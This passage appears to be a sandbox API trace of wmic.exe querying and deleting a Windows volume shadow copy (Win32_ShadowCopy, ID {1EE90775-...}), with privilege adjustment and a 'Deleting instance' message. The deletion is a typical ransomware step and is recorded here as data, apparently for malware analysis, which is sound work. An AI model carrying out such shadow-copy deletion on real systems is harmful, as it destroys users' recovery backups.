wReserved2=0x0, wReserved3=0x0, varVal1=0x1ca658, varVal2=0x45cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf3a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x45cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.794] free (_Block=0x45cb80) [0111.794] lstrlenW (lpString=".") returned 1 [0111.794] malloc (_Size=0x4) returned 0x457140 [0111.794] lstrlenW (lpString=".") returned 1 [0111.794] malloc (_Size=0x18) returned 0x45cb80 [0111.794] IWbemClassObject:Get (in: This=0x1df09c0, wszName="Authority", lFlags=0, pVal=0xaf3a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ca658, varVal2=0x45cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf3a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ca658, varVal2=0x45cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.795] free (_Block=0x45cb80) [0111.795] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.795] IUnknown:Release (This=0x1df09c0) returned 0x1 [0111.795] GetCurrentThreadId () returned 0xb08 [0111.795] ??0CHString@@QEAA@XZ () returned 0xaf378 [0111.795] malloc (_Size=0x18) returned 0x45cb80 [0111.795] IWbemClassObject:Get (in: This=0x1df04e0, wszName="__RELPATH", lFlags=0, pVal=0xaf3a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1ca658, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0xaf3a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0111.795] free (_Block=0x45cb80) [0111.795] malloc (_Size=0x18) returned 0x45cb80 [0111.795] GetCurrentThreadId () returned 0xb08 [0111.795] ??0CHString@@QEAA@XZ () returned 0xaf1f8 [0111.795] ??0CHString@@QEAA@PEBG@Z () returned 0xaf210 [0111.795] ??0CHString@@QEAA@AEBV0@@Z () returned 0xaf1a0 [0111.795] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0111.795] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x45d020 [0111.795] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0111.795] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xaf160 [0111.795] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xaf1a8 [0111.795] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf210 [0111.795] ??1CHString@@QEAA@XZ () returned 0x4cd87701 [0111.796] ??1CHString@@QEAA@XZ () returned 0x4cd87701 [0111.796] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xaf168 [0111.796] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf1a0 [0111.796] ??1CHString@@QEAA@XZ () returned 0x1 [0111.796] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x45d090 [0111.796] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0111.796] ?Left@CHString@@QEBA?AV1@H@Z () returned 0xaf160 [0111.796] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0xaf1a8 [0111.796] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf210 [0111.796] ??1CHString@@QEAA@XZ () returned 0x4cd87701 [0111.796] ??1CHString@@QEAA@XZ () returned 0x4cd87701 [0111.796] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0xaf168 [0111.796] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0xaf1a0 [0111.796] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.796] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0111.796] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.796] malloc (_Size=0x18) returned 0x45cba0 [0111.796] malloc (_Size=0x18) returned 0x45cc00 [0111.796] malloc (_Size=0x18) returned 0x45cc20 [0111.796] malloc (_Size=0x18) returned 0x45cc40 [0111.796] malloc (_Size=0x18) returned 0x45cc60 [0111.796] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0111.796] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0111.796] malloc (_Size=0x18) returned 0x45cc80 [0111.796] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0111.796] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0111.797] malloc (_Size=0x18) returned 0x45cca0 [0111.797] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0111.797] SysStringLen (param_1="\"") returned 0x1 [0111.797] free (_Block=0x45cc80) [0111.797] free (_Block=0x45cc60) [0111.797] free (_Block=0x45cc40) [0111.797] free (_Block=0x45cc20) [0111.797] free (_Block=0x45cc00) [0111.797] free (_Block=0x45cba0) [0111.797] IWbemServices:GetObject (in: This=0x1de3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xaf1e8*=0x0, ppCallResult=0x0 | out: ppObject=0xaf1e8*=0x1df0a50, ppCallResult=0x0) returned 0x0 [0111.798] malloc (_Size=0x18) returned 0x45cba0 [0111.798] IWbemClassObject:Get (in: This=0x1df0a50, wszName="Text", lFlags=0, pVal=0xaf220*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff522ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0xaf220*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c4ab0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x14e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0111.798] free (_Block=0x45cba0) [0111.799] SafeArrayGetLBound (in: psa=0x1c4ab0, nDim=0x1, plLbound=0xaf200 | out: plLbound=0xaf200) returned 0x0 [0111.799] SafeArrayGetUBound (in: psa=0x1c4ab0, nDim=0x1, plUbound=0xaf1f0 | out: plUbound=0xaf1f0) returned 0x0 [0111.799] SafeArrayGetElement (in: psa=0x1c4ab0, rgIndices=0xaf1e4, pv=0xaf238 | out: pv=0xaf238) returned 0x0 [0111.799] malloc (_Size=0x18) returned 0x45cba0 [0111.799] malloc (_Size=0x18) returned 0x45cc00 [0111.799] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0111.799] free (_Block=0x45cba0) [0111.799] IUnknown:Release (This=0x1df0a50) returned 0x0 [0111.799] free (_Block=0x45cca0) [0111.799] ??1CHString@@QEAA@XZ () returned 0x4cd87701 [0111.799] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.799] free (_Block=0x45cb80) [0111.799] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.799] lstrlenW (lpString="Shadow copy management.") returned 23 [0111.799] malloc (_Size=0x30) returned 0x4585c0 [0111.799] lstrlenW (lpString="Shadow copy management.") returned 23 [0111.799] free (_Block=0x45cc00) [0111.799] IUnknown:Release (This=0x1df04e0) returned 0x0 [0111.799] free (_Block=0x45cbc0) [0111.799] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.799] lstrlenW (lpString="PATH") returned 4 [0111.799] lstrlenW (lpString="where") returned 5 [0111.799] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0111.800] lstrlenW (lpString="WHERE") returned 5 [0111.800] lstrlenW (lpString="where") returned 5 [0111.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0111.800] lstrlenW (lpString="/") returned 1 [0111.800] lstrlenW (lpString="ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'") returned 43 [0111.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0111.800] lstrlenW (lpString="-") returned 1 [0111.800] lstrlenW (lpString="ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'") returned 43 [0111.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0111.800] lstrlenW (lpString="ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'") returned 43 [0111.800] malloc (_Size=0x58) returned 0x45d020 [0111.800] lstrlenW (lpString="ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'") returned 43 [0111.800] lstrlenW (lpString="/") returned 1 [0111.800] lstrlenW (lpString="delete") returned 6 [0111.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0111.800] lstrlenW (lpString="-") returned 1 [0111.800] lstrlenW (lpString="delete") returned 6 [0111.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0111.800] lstrlenW (lpString="delete") returned 6 [0111.800] malloc (_Size=0xe) returned 0x45cbc0 [0111.800] lstrlenW (lpString="delete") returned 6 [0111.800] lstrlenW (lpString="GET") returned 3 [0111.800] lstrlenW (lpString="delete") returned 6 [0111.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0111.800] lstrlenW (lpString="LIST") returned 4 [0111.800] lstrlenW (lpString="delete") returned 6 [0111.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0111.800] lstrlenW (lpString="SET") returned 3 [0111.800] lstrlenW (lpString="delete") returned 6 [0111.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0111.800] lstrlenW (lpString="CREATE") returned 6 [0111.800] lstrlenW (lpString="delete") returned 6 [0111.800] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0111.801] lstrlenW (lpString="CALL") returned 4 [0111.801] lstrlenW (lpString="delete") returned 6 [0111.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0111.801] lstrlenW (lpString="ASSOC") returned 5 [0111.801] lstrlenW (lpString="delete") returned 6 [0111.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0111.801] lstrlenW (lpString="DELETE") returned 6 [0111.801] lstrlenW (lpString="delete") returned 6 [0111.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0111.801] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0111.801] malloc (_Size=0x3e) returned 0x45d080 [0111.801] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0111.801] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0111.801] malloc (_Size=0x18) returned 0x45cc00 [0111.801] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0111.801] lstrlenW (lpString="FROM") returned 4 [0111.801] lstrlenW (lpString="*") returned 1 [0111.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0111.801] malloc (_Size=0x18) returned 0x45cb80 [0111.801] free (_Block=0x45cc00) [0111.801] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0111.801] lstrlenW (lpString="FROM") returned 4 [0111.801] lstrlenW (lpString="from") returned 4 [0111.801] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0111.801] malloc (_Size=0x18) returned 0x45cc00 [0111.802] free (_Block=0x45cb80) [0111.802] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0111.802] malloc (_Size=0x18) returned 0x45cb80 [0111.802] free (_Block=0x45cc00) [0111.802] free (_Block=0x45d080) [0111.802] free (_Block=0x45cb80) [0111.802] lstrlenW (lpString="SET") returned 3 [0111.802] lstrlenW (lpString="delete") returned 6 [0111.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0111.802] lstrlenW (lpString="CREATE") returned 6 [0111.802] lstrlenW (lpString="delete") returned 6 [0111.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0111.802] free (_Block=0x45cef0) [0111.802] malloc (_Size=0x8) returned 0x456f20 [0111.802] lstrlenW (lpString="GET") returned 3 [0111.802] lstrlenW (lpString="delete") returned 6 [0111.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0111.802] lstrlenW (lpString="LIST") returned 4 [0111.802] lstrlenW (lpString="delete") returned 6 [0111.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0111.802] lstrlenW (lpString="ASSOC") returned 5 [0111.802] lstrlenW (lpString="delete") returned 6 [0111.802] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0111.802] WbemLocator:IUnknown:AddRef (This=0x1dd1390) returned 0x3 [0111.802] free (_Block=0x29dfb0) [0111.802] lstrlenW (lpString="") returned 0 [0111.802] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0111.803] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.803] malloc (_Size=0x14) returned 0x45cb80 [0111.803] lstrlenW (lpString="XDUWTFONO") returned 9 [0111.803] GetCurrentThreadId () returned 0xb08 [0111.803] GetCurrentProcess () returned 0xffffffffffffffff [0111.803] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xaf5c0 | out: TokenHandle=0xaf5c0*=0x280) returned 1 [0111.803] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xaf5b8 | out: TokenInformation=0x0, ReturnLength=0xaf5b8) returned 0 [0111.803] malloc (_Size=0x118) returned 0x45d080 [0111.803] GetTokenInformation (in: TokenHandle=0x280, TokenInformationClass=0x3, TokenInformation=0x45d080, TokenInformationLength=0x118, ReturnLength=0xaf5b8 | out: TokenInformation=0x45d080, ReturnLength=0xaf5b8) returned 1 [0111.803] AdjustTokenPrivileges (in: TokenHandle=0x280, DisableAllPrivileges=0, NewState=0x45d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1378322999, Attributes=0xe8ca), (Luid.LowPart=0x0, Luid.HighPart=4574960, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0111.803] free (_Block=0x45d080) [0111.803] CloseHandle (hObject=0x280) returned 1 [0111.803] lstrlenW (lpString="GET") returned 3 [0111.803] lstrlenW (lpString="delete") returned 6 [0111.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0111.803] lstrlenW (lpString="LIST") returned 4 [0111.803] lstrlenW (lpString="delete") returned 6 [0111.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0111.803] lstrlenW (lpString="SET") returned 3 [0111.803] lstrlenW (lpString="delete") returned 6 [0111.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0111.803] lstrlenW (lpString="CALL") returned 4 [0111.803] lstrlenW (lpString="delete") returned 6 [0111.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0111.803] lstrlenW (lpString="ASSOC") returned 5 [0111.803] lstrlenW (lpString="delete") returned 6 [0111.803] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0111.803] lstrlenW (lpString="CREATE") returned 6 [0111.804] lstrlenW (lpString="delete") returned 6 [0111.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0111.804] lstrlenW (lpString="DELETE") returned 6 [0111.804] lstrlenW (lpString="delete") returned 6 [0111.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0111.804] malloc (_Size=0x18) returned 0x45cc00 [0111.804] lstrlenA (lpString="") returned 0 [0111.804] malloc (_Size=0x2) returned 0x29dfb0 [0111.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4b314c, cbMultiByte=-1, lpWideCharStr=0x29dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0111.804] free (_Block=0x29dfb0) [0111.804] malloc (_Size=0x18) returned 0x45cca0 [0111.804] lstrlenA (lpString="") returned 0 [0111.804] malloc (_Size=0x2) returned 0x29dfb0 [0111.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4b314c, cbMultiByte=-1, lpWideCharStr=0x29dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0111.804] free (_Block=0x29dfb0) [0111.804] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0111.804] malloc (_Size=0x3e) returned 0x45d080 [0111.804] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0111.804] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0111.804] malloc (_Size=0x18) returned 0x45cba0 [0111.804] free (_Block=0x45cca0) [0111.804] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0111.804] lstrlenW (lpString="FROM") returned 4 [0111.804] lstrlenW (lpString="*") returned 1 [0111.804] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0111.804] malloc (_Size=0x18) returned 0x45cca0 [0111.805] free (_Block=0x45cba0) [0111.805] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0111.805] lstrlenW (lpString="FROM") returned 4 [0111.805] lstrlenW (lpString="from") returned 4 [0111.805] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0111.805] malloc (_Size=0x18) returned 0x45cba0 [0111.805] free (_Block=0x45cca0) [0111.805] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0111.805] malloc (_Size=0x18) returned 0x45cca0 [0111.805] free (_Block=0x45cba0) [0111.805] free (_Block=0x45d080) [0111.805] malloc (_Size=0x18) returned 0x45cba0 [0111.805] malloc (_Size=0x18) returned 0x45cc20 [0111.805] malloc (_Size=0x18) returned 0x45cc40 [0111.805] malloc (_Size=0x18) returned 0x45cc60 [0111.805] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0111.805] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0111.806] malloc (_Size=0x18) returned 0x45cc80 [0111.806] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0111.806] SysStringLen (param_1=" WHERE ") returned 0x7 [0111.806] malloc (_Size=0x18) returned 0x45ccc0 [0111.806] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0111.806] SysStringLen (param_1="ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'") returned 0x2b [0111.806] free (_Block=0x45cc00) [0111.806] free (_Block=0x45cc80) [0111.806] free (_Block=0x45cc60) [0111.806] free (_Block=0x45cc40) [0111.806] free (_Block=0x45cc20) [0111.806] free (_Block=0x45cba0) [0111.806] ??0CHString@@QEAA@XZ () returned 0xaf530 [0111.806] GetCurrentThreadId () returned 0xb08 [0111.806] malloc (_Size=0x18) returned 0x45cba0 [0111.806] malloc (_Size=0x18) returned 0x45cc20 [0111.806] malloc (_Size=0x18) returned 0x45cc40 [0111.806] malloc (_Size=0x18) returned 0x45cc60 [0111.806] malloc (_Size=0x18) returned 0x45cc80 [0111.806] SysStringLen (param_1="\\\\") returned 0x2 [0111.806] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0111.807] malloc (_Size=0x18) returned 0x45cc00 [0111.807] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0111.807] SysStringLen (param_1="\\") returned 0x1 [0111.807] malloc (_Size=0x18) returned 0x45cce0 [0111.807] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0111.807] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0111.807] free (_Block=0x45cc00) [0111.807] free (_Block=0x45cc80) [0111.807] free (_Block=0x45cc60) [0111.807] free (_Block=0x45cc40) [0111.807] free (_Block=0x45cc20) [0111.807] free (_Block=0x45cba0) [0111.807] malloc (_Size=0x18) returned 0x45cba0 [0111.807] malloc (_Size=0x18) returned 0x45cc20 [0111.807] malloc (_Size=0x18) returned 0x45cc40 [0111.807] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1dd1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff5229d0 | out: ppNamespace=0xff5229d0*=0x1de3c18) returned 0x0 [0111.812] free (_Block=0x45cc40) [0111.812] free (_Block=0x45cc20) [0111.812] free (_Block=0x45cba0) [0111.812] CoSetProxyBlanket (pProxy=0x1de3c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0111.812] free (_Block=0x45cce0) [0111.812] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0111.812] ??0CHString@@QEAA@XZ () returned 0xaf480 [0111.812] GetCurrentThreadId () returned 0xb08 [0111.812] malloc (_Size=0x18) returned 0x45cce0 [0111.812] lstrlenA (lpString="") returned 0 [0111.812] malloc (_Size=0x2) returned 0x29dfb0 [0111.812] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff4b314c, cbMultiByte=-1, lpWideCharStr=0x29dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0111.812] free (_Block=0x29dfb0) [0111.812] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'") returned 0x50 [0111.812] SysStringLen (param_1="") returned 0x0 [0111.812] free (_Block=0x45cce0) [0111.812] malloc (_Size=0x18) returned 0x45cce0 [0111.812] IWbemServices:ExecQuery (in: This=0x1de3c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'", lFlags=0, pCtx=0x0, ppEnum=0xaf488 | out: ppEnum=0xaf488*=0x1de3d18) returned 0x0 [0111.846] free (_Block=0x45cce0) [0111.847] CoSetProxyBlanket (pProxy=0x1de3d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0111.849] IEnumWbemClassObject:Next (in: This=0x1de3d18, lTimeout=-1, uCount=0x1, apObjects=0xaf490, puReturned=0xaf4a0 | out: apObjects=0xaf490*=0x1de3d80, puReturned=0xaf4a0*=0x1) returned 0x0 [0111.850] malloc (_Size=0x18) returned 0x45cce0 [0111.850] IWbemClassObject:Get (in: This=0x1de3d80, wszName="__PATH", lFlags=0, pVal=0xaf4b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xaf4b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0111.850] free (_Block=0x45cce0) [0111.850] malloc (_Size=0x800) returned 0x45d080 [0111.850] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x45d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0111.850] FormatMessageW (in: dwFlags=0x2500, lpSource=0x45d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0xaf3d8, nSize=0x0, Arguments=0xaf3e8 | out: lpBuffer="뚐\x1a") returned 0x67 [0111.850] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0111.850] malloc (_Size=0x68) returned 0x45d890 [0111.851] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x45d890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0111.851] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff522ab0 [0111.851] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0111.851] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0111.851] free (_Block=0x45d890) [0111.851] free 